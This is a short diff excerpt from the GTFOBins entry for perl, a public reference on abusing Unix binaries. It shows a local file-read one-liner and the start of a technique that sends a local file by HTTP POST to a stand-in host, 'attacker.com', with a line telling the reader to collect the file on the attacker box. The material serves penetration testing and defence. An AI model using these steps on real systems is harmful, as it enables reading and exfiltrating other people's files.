GTFOBins/GTFOBins.github.io/_gtfobins/perl.md

         LFILE=file_to_read
         perl -ne print $LFILE
   file-upload:
     - description: Send local file via "d" parameter of a HTTP POST request.
+Run an HTTP service on the attacker box to collect the file.
       code: |
         export RHOST=attacker.com
         export RPORT=8080